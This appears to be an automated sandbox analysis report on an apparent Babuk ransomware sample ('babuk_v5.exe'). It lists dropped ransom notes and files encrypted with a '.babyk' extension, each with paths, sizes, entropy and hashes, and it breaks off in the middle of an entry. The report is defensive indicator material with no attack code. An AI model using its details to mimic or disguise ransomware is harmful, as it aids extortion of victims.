                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Music\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\NTUSER.DAT.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):57512
                                                                            Entropy (8bit):7.996530664770117
                                                                            Encrypted:true
                                                                            SSDEEP:1536:aSYXjoCaioBI7QK6whIu3FTz8tmxOGVvNh5Ol:aJUCavRDEh1uch8
                                                                            MD5:71742DE25FAD93431BD579F5FE514729
                                                                            SHA1:066644280809ED01B3098B8119C29E32CA6751B8
                                                                            SHA-256:6E3ADCFF924E4A9FFB51D217B6C26D5D1B21DDB0A8CF088A8D4A6C01C069CE4F
                                                                            SHA-512:A5A326B8D80BE54E74F1ED5DA2295FD3E94C94D3157C144D05BD8C92C47E458738ECE5FCEB844E0E977F378A6F6FE192116F6EBF44CB9047B6AA81F23B3A2FD4
                                                                            Malicious:true
                                                                            C:\Users\Default\NTUSER.DAT.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.4596564293617424
                                                                            Encrypted:false
                                                                            SSDEEP:3:tliuvqE13+jreZUz0BP6DjrTj7Uk718+yvBqUNJ5x0NLUxNvEEn:SgN34qqw56DDj4Y8+yvBqAJ5x0L0vtn
                                                                            MD5:29BBC4BA3978D3B50DABEEED0EA90798
                                                                            SHA1:029038BD8785D7C9A9B984B0C681FD567FA3F721
                                                                            SHA-256:140E6300A63EFCC8DABE39C6CF90BF8DF88557BFC36F4B09E3F19E6625ACF401
                                                                            SHA-512:FEA9376B5C49C60A2524161E777500FADD9E821DED88DAE13C72DC8088C5290A9315439D5216150EADEAC5483EDD13C2AE0F40BD38ECD59BD1E565FC5AB532AA
                                                                            Malicious:false
                                                                            Preview: ....Q...._.^..._...W_.^....-<n....(.......|1V9.'.w.....Hn.ao..j.....EMH...19.N......M....%nK...5on..v..a8?.O...,..emn}}G.5{.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997083212115577
                                                                            Encrypted:true
                                                                            SSDEEP:1536:2Sy8uJajKoWDCOc8igmjxdFYLqUGG2F7BI:recKoWDCWmj7e2Mq7BI
                                                                            MD5:C770F55D520F958E6645C853E7888EE1
                                                                            SHA1:E3BB3183910742C339C949CFB34C06E2252375A6
                                                                            SHA-256:08D36FDA52CFA90C9AB1B9168D221FF41ECCD41A6EB95D70E19454683B0512B8
                                                                            SHA-512:4B70AD5B5781F6F52B81E4B67AC8A02DF7DE63D0B54513FBBF4F57497B2BA165950660F1A6E9EABD293CE2F1B13E56F59B3CE273675BAC810BBD0654EF7B8552
                                                                            Malicious:true
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999628272843094
                                                                            Encrypted:true
                                                                            SSDEEP:12288:us3N8bEyS7SkOYefgsUee1HdtfwLX/Fjq3t5Y+xzLfTWMS:/R7FOBgsRe1HfQX/FmtnxPfTo
                                                                            MD5:64C46DACA4D696DFA733390B4A8F1628
                                                                            SHA1:D10073B9A5656C1551ED406142C3B0A78838F366
                                                                            SHA-256:A8CE844EA05F86B8BC0DB1E2D0C348CCC4DF6D47D17FF264D76A95CE3AF7E107
                                                                            SHA-512:7553B0E58B5ED9BF1FD0E675E130FF1EF9A3A9F29897A03D9AC67811641FE9BE8368371D84C7505429E4B651E2CB191BBA4F8A844441E583B06279B1FD5D9F5E
                                                                            Malicious:true
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999673841425525
                                                                            Encrypted:true
                                                                            SSDEEP:12288:XX6L0H/+BDqX0R6s7CVaY/RLicLKG3+Pmp2I4HHAHF:j+BDqERR7Ck+dz3+PmvYqF
                                                                            MD5:2DEDD4D3293F511210FA655C83F71202
                                                                            SHA1:B4F6464587181C9535E58124AF5B526BD92DF6A3
                                                                            SHA-256:27264078A1B41C7905D810175497A1FD90C77A43987D23E7016AE7BE22A51BD6
                                                                            SHA-512:5B7F5CD6C41152DB0A1D8F57B3DB4CCDFD62D5C618FC0F7ADD1C84590EA5B2290A915006BCC51D3FCE9921AB2605649F98D197BCAD0AE1F832467613624D96E1
                                                                            Malicious:true
                                                                            C:\Users\Default\Pictures\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Saved Games\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Videos\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\3D Objects\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1203
                                                                            Entropy (8bit):7.84607657210294
                                                                            Encrypted:false
                                                                            SSDEEP:24:fYbXZChMpjgnuu6oexQHX9x5RxnYh4YRSGPND4SKvuKEu:KXZChUMnKoeijxnM4YRTPN7Y
                                                                            MD5:2421A4CB843C40E3A1A01BE2F7672E05
                                                                            SHA1:9F35BE6728812CD9DF659A6C2B7818202FC6777B
                                                                            SHA-256:78330F3F019294739383C690C8F1DBBFF1E512E6B3C2CB12C1BA39C1E6D445AF
                                                                            SHA-512:7CD19CBCDCB9000DE9694E008FE7A155D1FFA9E25D1F9F3CD60A8445ACFE9D22C6B1BA73C3C0C3DB379F0557B33F88A0E45494EAFC889853CCE548935496E1E5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):80556
                                                                            Entropy (8bit):7.997364599399268
                                                                            Encrypted:true
                                                                            SSDEEP:1536:zGnKxm9LViWawICgCyWxOJ3+7o0MMW8ghyHnH7hQiDyAh/Sc2fNK6S1D9NP3+P1F:zGnKM9dI4YottcyHnbhQiD/h2fNK9pN0
                                                                            MD5:81013757FF32B78A341BB48968DE4EF5
                                                                            SHA1:38DE45B824BA7A2317BEF94C5709BF69D3538754
                                                                            SHA-256:09AC1E00608083475D9DB730E0D924C6E6538CFDBB57C73A913F089E5406D9D2
                                                                            SHA-512:7C1B050E04071A980C0E1A71A1D95795AB044ED752E837ACF291B123CD8681A3644B9055CA76EEC2AA7059DEB9BAA6B5CB2313A6B7E7CFF8E57B7C6BA0E0180B
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):9734
                                                                            Entropy (8bit):7.982017278728285
                                                                            Encrypted:false
                                                                            SSDEEP:192:fnxYzlhvacJqErKF8dRLw62zGPfRb+nxLDEW4dTpyggqcuPX2WQTe:v0jr1zLHPf5i5ED1NbPge
                                                                            MD5:275D3448C381F06604B97ED78FA86A62
                                                                            SHA1:BFBDDC80DF4E52E4FE3A07022FE34222BDCAE18D
                                                                            SHA-256:CFDCD396CFDDDD209696E10667FE2EDAF705D0FD45CEEB33115310054D9D6AC8
                                                                            SHA-512:7B3176B014209AA51C8A026057BCE684AE03E3B7F9E8713D02CD8DC2149C977D20C3F0A12C03748B801360C5A1D7179D017E6D8A294969F4FF6AE066534C55A1
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):235723
                                                                            Entropy (8bit):7.999251673329134
                                                                            Encrypted:true
                                                                            SSDEEP:6144:JRwGNYhWrTaiC84GUZm/7f8MeavCqCLDBYEqkWNGk:JRVNYhQNDXeVdDHuGk
                                                                            MD5:69E8E54DCF966D93FDDE5ADDA63F559E
                                                                            SHA1:727F169F5CFF273FE5BCD7E14222A1084E12BAE2
                                                                            SHA-256:C4967CC147E06AC4106EF02B00F39F8BD3AABCD90FA6DC09914EEB04C7A055B5
                                                                            SHA-512:5CFFD0BEEA0C27902A681DDFF6E3DA95A74B7A75A72C2E0DBBA9C304822A5C82C6C0EA5CD517A94BC4E799D6EBC6B2AAE0361DA3C316F1C0FBE129DEE4F0805D
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):12456
                                                                            Entropy (8bit):7.984400639023804
                                                                            Encrypted:false
                                                                            SSDEEP:384:X5ciR6/Yeo5HfLMFbslbXYaIvT8mjfEDQccIJbVHh:X5cF/YttLMxslm79jcckJbz
                                                                            MD5:94EC05B831AA570BDF10FB750B0C8714
                                                                            SHA1:5A030FAEBE421F29E162168DC8318E74D8FB628F
                                                                            SHA-256:F2F57E1324C49A1AF7657373E495D507C659AE078F65A799FF0445BA9F145901
                                                                            SHA-512:BAAB8D22130AEA55DD69E14CE2A7BE35051FDD029019F150CC917B657988B7781A295C6629537B44D554CCB3DBA10E6E5E65BB1B8F7748764169C476CBACC4B3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):32821
                                                                            Entropy (8bit):7.994684125304462
                                                                            Encrypted:true
                                                                            SSDEEP:768:El+lM/BPt8U0UXRji511AmpEhZ5kD6sgW5GMErKazRGskDY0ILHJ:Ed/B2raFO1ASgZ5kOszYPrK2Gsk2HJ
                                                                            MD5:0C302372801CE62D404CAFE750AE3F6A
                                                                            SHA1:6D8EFCF1ECAEC1FB80705AC1D1CA645F28560DE1
                                                                            SHA-256:9199524384CF22247590FF4A77C1B96485EE616A45C067D0A25164CF0EDC71CE
                                                                            SHA-512:DD8FA1DC5F58E5D0D80B22E00C967652AFAC01D44B33110573597DC6EE3264B42647F7E7E7E8A9D452D5DF7B399F0D3C95412234398D12EEFC95F5CA137AD71D
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):766
                                                                            Entropy (8bit):7.7511344243421885
                                                                            Encrypted:false
                                                                            SSDEEP:12:cr8QSUPADAQN+g4rihFKveZ67A4zpH8khY8nHJswBfFScYF+3E8Nrd38yzVW3J/w:cVS3MOdjvQ04zqkhhpsw1Od85d38yzYI
                                                                            MD5:E754EECD721E3885B13ED6BAA0E03F31
                                                                            SHA1:C08ED1656638F10D4F454C02CB102EEC3D2A2AB6
                                                                            SHA-256:1CCCFEB09E6511F0627A5B6DA58F41ECDDC15D00D62151672DAEC7D1866BFEDA
                                                                            SHA-512:2C8EA352C25E8F3536C074868EEDA73F6B4C048E100022CE148E56FB51B7FA5E2D4443573612A70202B42CB8BE8AB6DEF425EF10EC575144AACE542D243A3563
                                                                            Malicious:false
                                                                            Preview: F.If.#........N.U..uI....?ye,..P.N!U.G......y...n.....y.G3.s.0....... l..g.&.y...7m*..........Ll.6uu..cJ.Ta...3....0U....G..*.\..>.G.i.....K.~....`#.)y...k.))..D"K.W....h.9Q.g....hW#.N.uR.)aD.Un.WW.b.o..*/`..D...Z^)..8..m..`n..C.n.h..n...,....`..k...{_.....Z..x#i....t....C...9...DU\..U+).0...3P.<.5I..-.....T........R......zJ.p1."........f..v..........Gj..8...h}2....s..H..N..T..bJ.......z..+.r3.uD.....7.v.o- .8...].e.|p.=.P...c2...G)Vc.5..a......7C....L.R.....}*X.l.IH.\...'o.4.$i..]s......h$E....>/.(N..2...&..E.[p_S...{gnT..VK1.....a...q^..q.~o.bw..}((Sg.'.........(..}rY+`.l.V.*...jC.m. ..T5.....d..=c.}.~ZZ...K.......d......}.._.}<,.A5./.'..f+Z..Fqc.\....{..o.M.ezm.4..eR..E]...Sj....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Adobe\Color\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\Color\Profiles\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Adobe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Comms\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.973430635830403
                                                                            Encrypted:false
                                                                            SSDEEP:192:lZ3+86U9bI0FyIaV3wBvzIYE9KdqH66kpSKtX+XLAy6:lZyUS6yjy8o6USqyky6
                                                                            MD5:893BCC84CB9E22BD7404B785C10F2D98
                                                                            SHA1:65E7958EB6C9B63E4AD1F4BEE0BFAEBB648D56FA
                                                                            SHA-256:389B8D4BBB371979E711A144D11CC2E377D6E9AB366AACF0B4B059A3893B0C8D
                                                                            SHA-512:BE3F9F853390073183F8B1B1704C0DE93D55C3A416995FA6AFE5163ED7C1A057C04D21644A7AB189E0E9D3C98DB7C51E449D18B61B5C14B73B58AFD5876C583D
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.9998408373383825
                                                                            Encrypted:true
                                                                            SSDEEP:24576:waUpb2h/GDGzPabrord4sVk6P1Mkyeqy3NlGVXt2:jSOrPKrop4sVvPifY6t2
                                                                            MD5:DC3D39C111FCE7C9C5BE052071CE5758
                                                                            SHA1:50FC41BD9326691D7B52FCD3C01568A274F3AE63
                                                                            SHA-256:30A4B319B873AF355E46A90B88618ED930A725F0E4BC28601E4BD9821A59EE46
                                                                            SHA-512:8EFD0FBB6A91176D221DBA1F7A34A94FD61F82D4FE95914D86B48A75B46A0455692267815700245C0DBD9209221CE813AAE6916863D8D3F421ABC414B353C4B0
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
